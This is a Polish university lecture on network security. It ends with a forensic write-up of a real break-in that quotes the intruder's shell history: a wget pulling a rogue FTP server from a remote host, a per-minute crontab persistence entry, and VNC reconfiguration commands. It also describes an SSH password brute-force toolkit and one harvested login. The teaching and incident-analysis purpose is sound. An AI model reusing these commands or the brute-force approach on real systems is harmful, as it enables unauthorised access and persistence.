BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH Igor T. Podolak Instytut Informatyki UJ 8 październik 2008 IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 1 / 35
CO OBEJMUJE BEZPIECZEŃSTWO SIECI? bezpieczeństwo systemów operacyjnych bezpieczeństwo systemow plikowych i informacji zabezpieczenie dostępu do systemów uwierzytelnianie użytkowników i danych kryptografia i protokoły bezpieczeństwa uwierzytelnianie użytkowników funkcje haszujace i podpisy cyfrowe protokoły ustanawiania kluczy systemy zarzadzania kluczami dzielenie tajemnic i kryptografia grupowa systemy z wiedza zerowa kontrola dostępu i wykrywanie intruzów w systemie elektroniczny handel i elektroniczne pieniadze bezpieczne protokoły IP bezpieczeństwo oprogramowania IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 2 / 35
TYPY ATAKÓW wirusy kradzież sprzętu wewnętrzne naruszenie praw nieuprawniony dostęp odmowa dostępu do usług (DoS) wlamania do systemu nieuprawniony dostęp WiFi kradzież informacji przestępstwa finansowe naruszenia telekomunikacyjne złe użycie aplikacji webowych przestępstwa przeciw aplikacjom siecowym sabotaż IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 3 / 35
ATAKI WEDŁUG STRAT zawirusowanie nieuprawniony dostęp do informacji kradzież sprzętu mobilnego kradzież informacji odmowa usług DoS dostęp do poczty email kradzież łacz telekomunikacyjnych zabronione wejście do systemu phishing zabroniony dostęp WiFi naruszenie instant messaging zle użycie aplikacji http sabotaż danych lub sieci naruszenie stron webowych podsłuchiwanie haseł ataki przeciw DNS IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 4 / 35
METODY OCHRONY zapory ogniowe (firewall) oprogramowanie antywirusowe oprogramowanie śledzace dostep kontrola dostępu do serwerów systemy detekcji włamań (IDS) kodowanie danych przy przesyłaniu kodowanie przechowywanych danych dostęp przez hasła zarzadzanie oprogramowaniem proxy i zapory na poziomie aplikacji karty i tokeny dostępu narzędzia śledzace struktura klucza publicznego PKI bezpieczność oprogramowania systemy biometryczne IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 5 / 35
METODY KONTROLI BEZPIECZEŃSTWA wewnetrzne audyty bezpieczeństwa testowanie możliwości włamania do systemu automatyczne narzędzia kontroli audyty bezpieczeństwa przez zewnętrzne firmy specjalistyczne śledzenie aktywności poczty śledzenie aktywności aplikacji webowych brak IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 6 / 35
TYPY ATAKÓW fizyczne podłuchiwanie włamania fizyczne wandalizm przez rozmowę podsłuchiwanie rozmów podsłuchiwanie komunikacji podawanie się za kogoś innego włamania skanowanie portów włamania do systemów denial of service wrogie oprogramowanie social engineering otwieranie załaczników kradzież informacji przeszukiwanie śmieci wyszukiwanie wrażliwych informacji w sieci IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 7 / 35
KIM SA ATAKUJACY? pracownicy wewnętrzni i współpracujacych frim script kiddies twórcy wirusów kryminaliści tylko testujacy systemy i informujacy o niedostatkach IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 8 / 35
ANALIZA RYZYKA identyfikacja i ocena zasobów identyfikacja możliwych zagrożeń ocena prawdopodobieństwa ataku wektor zagrożeń ŹRÓDŁA pracownicy, sprzataj acy, konkurencja, terroryści, pogoda, zatrudnieni z zewnatrz ZAGROŻENIA kradzież sprzętu i informacji, ujawnienie informacji, szpiegostwo, przestępstwa finansowe, DoS, utrata i zmiana danych, błędy ludzkie, problemy sprzetowe CELE sprzęt, miejsca przechowywania danych, systemy operacyjne, oprogramowanie, dokumentacja, dane, własność intelektualna, poczta komputerowa, telefony i faksy IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 9 / 35
MODELE BEZPIECZEŃSTWA LILLIPOP pojedyncza zapora wokoł zasobów system nie zabezpieczony po przekroczeniu ogrodzenia system nie ustala poziomów bezpieczeństwa nie zabezpiecza przed wewnętrznymi atakami CEBULKOWY szereg warstw określa kolejne poziomy bezpieczeństwa warstwy dostępu, identyfikacji, audytu, monitorowania, segmentacji, fizycznej ochrony STREFY ZAUFANIA podział w zależności od funkcjonalności różne poziomy zaufania wykorzystanie reguł zapór i list kontroli dostepu ACL IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 10 / 35
REGUŁY POLITYKI BEZPIECZEŃSTWA IDENTYFIKACJI konto/hasło, dwustopniowa identyfikacja, kontrola jakosci haseł SIECIOWE kontrola połaczeń wchodzacych, blokowanie nieuprawnionego dostępu, wirtualna sieć prywatna, OCHRONY DANYCH prawa własności, monitorowanie poczty, poziomy klasyfikacji, kodowanie danych wchodzacych i wychodzacych, śledzenie wymiany przez praconików, usuwanie dokumentów papierowych i elektronicznych, dostęp do danych serwerów, kontrola sieci wysokiego ryzyka SPOJNOŚCI DANYCH backup, aktualizacja oprogramowania ADMINISTRACJI SYSTEMEM monitorowanie aplikacji i systemów WYKORZYSTANIA SYSTEMU reguły użycia przez pracownikow, prywatne użycie systemu KONTROLI BEZPIECZENSTWA tajność prac w systemie, audyty DOSTEPU FIZYCZNEGO zależność od funkcji, uwierzytelnianie dostępu IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 11 / 35
ANATOMIA ATAKU rekonesans social engineering fizyczny rekonesans atakowanego rekonesans sieci/ip, rekonesans www rozpoznanie DNS wyszukiwanie celów war dialing rozpoznanie struktury atakowanego systemu skanowanie portów rozpoznanie i testowanie słabych punktów penetracja systemu łamanie haseł ataki na aplikacje penetracja c.d. włamania do systemu plikowego umieszczenie wrogiego kodu manipulacja procesami łamanie procesów powłok przejmowanie sesji spoofing przejmowanie ruchu w sieci wykorzystanie relacji zaufania denial of service systemowe i sieciowe korzystanie rozszerzenie ataku na inne składniki sieci umieszczanie trojanów, backdoor, rootkit ochrona przed wykryciem IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 12 / 35
SOCIAL ENGINEERING I REKONESANS NA MIEJSCU hasło i informacja o koncie papierowe notatki, śmieci, przenośne nośniki danych listy adresów email, informacje z systemu informacyjengo numery telefoniczne notatki papierowe, informacje od usług informacyjnych pozwala na ataki social engineering, także war dialing rozpoznanie i mapa systemu: numery IP, nazwy serwerów, usługi, aplikacje, architektura notatki, przenośne nośniki, dokumentacja systemu, kradzież social engineering, narzędzia inne narzędzia wyszukiwarki (także www.dogpile.com, www.ferretsoft.com) narzędzia finansowe Securities Comission (www.sec.gov/edgar.shtml) NASDAQ (www.nasdaq.com) NY Stock Exchange (www.nyse.com) ksiażki telefoniczne (www.bigyellow.com) IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 13 / 35
REKONESANS IP najpierw konieczne wykrycie prawdopodobnych nazw domen w standardowych spisch wykrycie właścicieli domen w systemach rejestrujacych wyszukiwanie wszystkich domen posiadanych przez organizację whois organizacja. @whois.crsnic.net ICANN dla domen.com,.net,.org www.icann.org/registrars/accredited-list.html dla innych www.allwhois.com inne serwery whois USA: www.arin.net/whois/arin-whois.html, Europa:www.ripe.net, domeny.com,.org,.net,.edu: www.crsnic.net/whois inne narzędzia whois www.netinfo.co.il www.nspw.com www.netsol.com/cgi-bin/whois/who is www.samspade.org www.ipswitch.com www.dns.pl/whois usługa powinna działać na porcie 43, obecnie głównie przez http IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 14 / 35
REKONESANS DNS standardowe zapytanie DNS może dać sporo informacji narzędzia nslookup i dig serwery nazw dig uj.edu.pl ns adresy IP dig ii.uj.edu.pl a serwer poczty dig ii.uj.edu.pl mx informacje o hostach dig uj.edu.pl info inne serwery www.demon.net/external host IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 15 / 35
MAPOWANIE SIECI I ADRESÓW IP wykrycie topologii sieci, nazw, usług celem jest wykrycie ewentualnych słabych punktów zwykle skaner ping/tcp:fping (www.fping.com), Nmap (www.insecure.com) ICMP ping jest typowo blokowany przez administratorów skanowanie TCP skanowanie portów / systemu operacyjnego / oprogramowania / słabości skanowanie słabości Nessus www.nessus.org), SARA (www-arc.com/sara), SATAN ( www.fish.com/ zen/satan/satan.html IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 16 / 35
WŁAMANIE zauważyłem w historii swojego komputera ul.ii.uj.edu.pl 960 uptime 961 df -h 962 pwd 963 ps x 964 mkdir.init 965 cd.init 966 wget ftp://happy:scanning@82.138.40.41:55955/ftpd 967 tar zxf ftpd-3.012.tar.gz 968 rm ftpd-3.012.tar.gz 969 mv ftp4all/*. 970 rmdir ftp4all 971./configure czy to było włamanie??? IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 17 / 35
WŁAMANIE ściagnięty serwer ftp ftp4all, kompilacja instalacja do specjalnie zalożonej kartoteki.init w mojej kartotece domowej skopiowane wszystkie pliki z.init/bin do.init/standard/sbin, nastepnie przekopiowal standard/sbin do sbin zmiana nazwy wykonywalnego pliku na xvmr - czy z czymś się kojarzy? podkartoteka ze źródłami wymazana, jednak ftp4all jest do ściagnięcia i można powtórzyć prawdopodbne operacje w etc/ftpd.reg ustawione sa adminport 60283 numer portu obsługi dla administratora ftp port 5902 w /home/igor/.init/f numer portu gdzie serwer jest dostępny 5902 to jeden z portow wykorzystywanych przez Xvnc otwarty na komputerze włamywacz musiał wcześniej skanować porty IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 18 / 35
WŁAMANIE W plikach msg/goodbye, msg/welcome, i msg/startup szereg zabawnych komunikatów: msg/startup: FTP server ready. Preceeding... msg/welcome: Welcome, 2 Another Great Server BY, -=FLOTILLA=msg/goodbye: GOOdBye, Hope 2 See U Again SOON...(= zabawne, prawda? IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 19 / 35
CRONTAB edycja mojej lokalnej tablicy cron, polegajaca na stałym uruchamianiu pliku xvmr, patrz lokalna tablica crontab: * * * * /home/igor/.init/sbin/xvmr a więc co minutę. poprawka naniesiona była 2 sierpnia o 19:45; to lokalizuje datę włamania IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 20 / 35
SKAD TO WŁAMANIE? W pliku /var/log/secure, pomiędzy wieloma nieudanymi, jest niepokojacy wpis, powtarzajacy się wiele razy August 2: 15:51:26: Address 194.6.239.2 maps to sip this does not map back to the address - POSSIBLE BR po wykorzystaniu odwrotnego mapowania dig -x 194.6.239.2 dostajemy nazwę sip.bernaunet.de, jednak mapowanie wprost dig sip.bernaunet.de zwraca adres 194.6.239.5, stad to ostrzeżenie. poszukiwanie przez WWW adresu www.bernaunet.de daje stronę firmy Wikom Elektrik GmbH włamywacz uruchamia swój program z wielu miejsc na świecie (albo jest ich wielu), gdzie włamał sie juz wcześniej nie wiadomo wciaż jaki jest oryginalny adres wlamywacza IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 21 / 35
XVNC last -f./wtmp nie pokazuje żadnego logowanie w okolicach feralnych modyfikacji ale wykorzystał dla ftp port 5902, a więc port Xvnc, a serwer Xvnc był uruchomiony, a także klient Xvnc dostał sie pewnie przez zalogowanie do otwartego wtedy połaczenia Xvnc ekran klienta Xvnc po ponownym połaczeniu z serwerem jest czarny i nic nie pomaga w jego uaktywnieniu, a serwer Xvnc na pewno dziala Czy Xvnc zapisuje gdzieś ślady dostępu??? ostatnie polecenie włamywacza to 1000 vncconfig -set AcceptpointerEvents=0 ; vncconfig -set AcceptkeyEvents=0 ; exit w której zmienia ustawienia konfiguracji vnc! Oto znaczenia zmienionych parametrów Xvnc AcceptPointerEvents: Accept pointer press and relea clients (default is on). tu włamywacz wyłaczył dzialanie myszki (pointer) IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 22 / 35
A CO JEST W ŚRODKU? W kartotece.init/f sa bardzo dziwne pliki: drwxrwxr-x 5 igor igor 4096 Aug 2 19:51. drwxrwxr-x 11 igor igor 4096 Aug 2 19:41.. drwx------ 2 igor igor 4096 Aug 2 19:48???? 100MBiT.PL 10GB??? drwx------ 2 igor igor 4096 Aug 2 19:48???? Dupe-FxP???? drwx------ 2 igor igor 4096 Aug 2 19:48???? @ FLOTILLA? -rw------- 1 igor igor 48 Aug 2 19:49.permissions Pliki.permissions w podkartotekach sa identyczne, jednak różne od tego w glownej podkartotece f w historii włamania jest polecenie utworzenia podkartoteki f, jednak nie sa utworzone żadne dalsze podkartoteki czy same pliki.permissions wyglada na to, że włamywacz utworzył sam serwer ftpd IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 23 / 35
połaczenie z serwerem następuje przez ftp ul 5902 połaczenie z portem administracji nie powodzi się (telnet ul 60283) włamywacz albo źle zainstalowal serwer albo nie miał zamiaru nim administrować IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 24 / 35
BŁEDY WŁAMYWACZA nie wyczyscił historii poleceń uruchomiony proces /home/igor/.init/xvmr wyświetla się w liście procesów ps -aux grep igor nie usunał wielu zbędnych już plikow z kartoteki.init, a usunał pliki źródłowe nie zadbał o to, by crontab nie wysyłał co chwilę maila o uruchomieniu serwera, np. From igor@ul.ii.uj.edu.pl Mon Aug 7 11:01:02 2006 Date: Mon, 7 Aug 2006 11:01:02 +0200 From: root@ul.ii.uj.edu.pl (Cron Daemon) To: igor@ul.ii.uj.edu.pl Subject: Cron <igor@ul> /home/igor/.init/sbin/xvmr X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/home/igor> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=igor> X-Cron-Env: <USER=igor> IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 25 / 35
CO ROBIĆ? wykasować kartotekę serwera ftpd, usunać wpis z tablicy crontab poczekać na połaczenie by wykryć włamywacza zmienić hasło uzytkownika igor sprawdzić tego użytkownika na innych komputerach ustawić blokadę dostępu do połaczeń tcp wykorzystujac tcp_wrappers sprawdzić adres użytkownika, ktory odgadł haslo IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 26 / 35
PROSTY SKRYPT uruchomiłem prosty skrypt #!/usr/bin/perl open(logfile, ">>slad.txt"); while(true) { \$s = netstat --tcp grep \"ul.ii.uj.edu.pl:590 if(length(\$s) > 0) { \$d = date ; chomp \$d; chomp \$s; print LOGFILE "\$d:\n\$s\n"; \$s = ""; } \$p = sleep 60; } majacy wyłapac wszelkich potencjalnych "klientów" serwera, w domyśle włamywacza, bo któż inny może o założonym serwerze wiedziec? IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 27 / 35
KTOŚ KORZYSTA! po kilku dniach plik śladu (ślad.txt) troche sie zapełnił: igor@ul wlamanie]$ cat slad.txt Fri Aug 4 12:30:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 E Fri Aug 4 12:31:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 E Fri Aug 4 12:32:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 F Sun Aug 6 10:39:32 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV62-0-110-40.bb.netv:3304 E Sun Aug 6 10:40:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV62-0-110-40.bb.netv:3304 E Sun Aug 6 10:41:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV62-0-110-40.bb.netv:3304 E Sun Aug 6 10:42:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV62-0-110-40.bb.netv:3304 E Sun Aug 6 10:43:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV62-0-110-40.bb.netv:3304 E Sun Aug 6 10:44:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV62-0-110-40.bb.netv:3304 E Sun Aug 6 10:45:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV62-0-110-40.bb.netv:3304 E Sun Aug 6 10:46:34 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV62-0-110-40.bb.netv:3304 E Sun Aug 6 10:47:34 CEST 2006: IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 28 / 35
ALE CO Z TEGO? listing kartoteki.init/f (a wiec korzenia nowego serwera ftp) daje [igor@ul f]$ ll total 32 drwx------ igor 4096 Aug 2 19:48???? 100MBiT.PL 10GB LINUX???? drwx------ igor 4096 Aug 2 19:48???? Dupe-FxP???? drwx------ igor 4096 Aug 2 19:48???? @ FLOTILLA @???? drwx------ igor 4096 Aug 6 10:45 Spikes.Women.of.Action.2006.WS.PDTV.X igor@ul Spikes.Women.of.Action.2006.WS.PDTV.XviD-PAP]$ l więc, nowy użytkownik załozył nowa kartoteka Spikes.Women.of.Action w której jest trochę nowych plików: total 358644 -rw------- igor 6518 Aug 6 10:39 PAP-Spikes.Women. -rw------- igor 15000000 Aug 6 10:39 PAP-swoa.r00 -rw------- igor 15000000 Aug 6 10:39 PAP-swoa.r01 -rw------- igor 15000000 Aug 6 10:40 PAP-swoa.r02 -rw------- igor 15000000 Aug 6 10:40 PAP-swoa.r03 -rw------- igor 15000000 Aug 6 10:40 PAP-swoa.r04 IGOR T. PODOLAK -rw------- (INSTYTUT INFORMATYKI igor UJ) BEZPIECZEŃSTWO 15000000 SIECIAug KOMPUTEROWYCH 6 10:40 PAP-swoa.r05 8 PAŹDZIERNIK 2008 29 / 35
I CO JESZCZE? a w kartotece.init/f/sample jest plik -rw------- 1 igor igor 3026944 Aug 6 10:39 Spikes razem wiec ok. 350 MB. to po prostu aktywne kobiety, dobrej jakości filmy istnieje coś takiego jak WOA Women of Action Network http://www.woa.tv dig www.woa.tv ujawnia domenę reardenstudios.com i serwer homer.reardenstudios.com (204.14.157.106 czyżby chcieli ułatwić sobie przekaz? IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 30 / 35
SPRZATANIE skasowany server vnc zmiana hasła użytkownika igor list do wikom@bernaunet.de z ostrzeżeniem, gdyż jeden z ataków byl przeprowadzony z adresu 194.6.239.2, ktory mapował się na sip.bernaunet.de a ten na nawww.bernaunet.de, a to była firma Wikom Elektrik GmbH w Bernie odpowiedź w bardzo szybkim tempie (mniej niż 20 minut) z info@ocsb.de: we have taken the affected machine of the net and have exchanged for another. We will analyze the log files and refund announcement against the suitable person. We apologise for your incommodities and can assure you from this server no more attack will go out. MfG bernaunet.de w odpowiedzi na pytanie o szczegoły następujaca odpowiedź a user s account ran obviously whole thus of the hackers has cracked. Then a Kernelbug must have been used with the help of the IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 31 / 35
CO ROBIŁ WŁAMYWACZ? loguje sie kolejno na kontach sven i potem mtvs sciaga linux3.tgz (w kartotece linux3) z members.lycos.co.uk/neneax/linux3.tgz, rozpakowuje go do kartoteki.m to jest open source irc bot written in C - patrz www.energymech.net ściaga z tego samego adresu scanx.tgz rozpakowujac do kartoteki chyba.de (niemiecka domena - firma jest w bernie, ale w niemieckiej domenie) ściaga tez plik de, ktory jest słownikiem niemieckich imion i innych prawdopodobnych nazw użytkowników uruchamia wtedy.de/x 149.156 (przykładowa nazwa domeny) ten jest skryptem uruchamiajacym.de/scan $1 22, czyli./de scan 149.156 22, a 22 to numer portu ssh - innymi słowy wyszukiwanie serwerów domenie 149.156 wykorzystujacych ssh, zapisujac ja w pliku uniq.txt IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 32 / 35
CO ROBIŁ WŁAMYWACZ? zbiera listę serwerów i uruchamia.de/xpl 100 german, a więc zapewne po 100 prób na każdym z serwerow xpl próbuje się jednocześnie połaczyc z wieloma serwerami z listy z uniq.txt na każdym próbujac tego samego użytkownika, i zapewne, to samo hasło W ten sposob wielokrotnie przyspiesza działania - mimo, że każda próba logowania trwa ok. 3 sekund, to próbujac kilkaset serwerow jednocześnie dostajemy przyspieszenie a gdzie wyniki? chyba sa online??? bo to GOT...??? albo tez sa zapisywane w pliku vuln.txt xpl jest bardzo podobne do ssh to jakaż przeróbka IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 33 / 35
CO ROBIŁ WŁAMYWACZ? strings xpl pokazuje między innymi %sgot IT!! -> %s:%s:%s jest to więc jakieś wypisanie wyniku, tak jak wyżej jest GOT IT./x 149.156 -> billing:habl99:194.6.239.2 ale nie jest nigdy ten plik ogladany na koncu wlamywacz oglada plik vuln.txt i później (razem z log.txt, status, i uniq.txt) usuwa go mimo przyspieszenia byłoby dobrze, gdyby włamywacz nie musiał kontrolować działania bezpośrednio i wyniki logowania były wysyłane co jakiś czas dla ulatwienia IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 34 / 35
LITERATURA J. Pieprzyk, T. Harjano, J. Seberry, Teoria bezpieczeństwa systemów komputerowych, Springer/Helion N. Ferguson, B. Schneier, Kryptografia w praktyce, Helion B. Schneier, Kryptografia dla praktyków, Wiley / WNT D. Denning, Wojna informacyjna i bezpieczeństwo informacji, ACM/WNT A. Menezes, P. Van Oorschot, S. Vanstone, Handbook of applied Cryptography, CRC (http://www.cacr.math.uwaterloo.ca/hac/) J. Viega, M. Messier, C i C++ bezpieczne programowanie: receptury, O Reilly/Helion S. Oaks, Java a bazpieczeństwo, O Reilly/RM C. Peikari, A. Chuvakian, Strażnik bezpieczeństwa danych, O Reilly/Helion IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 35 / 35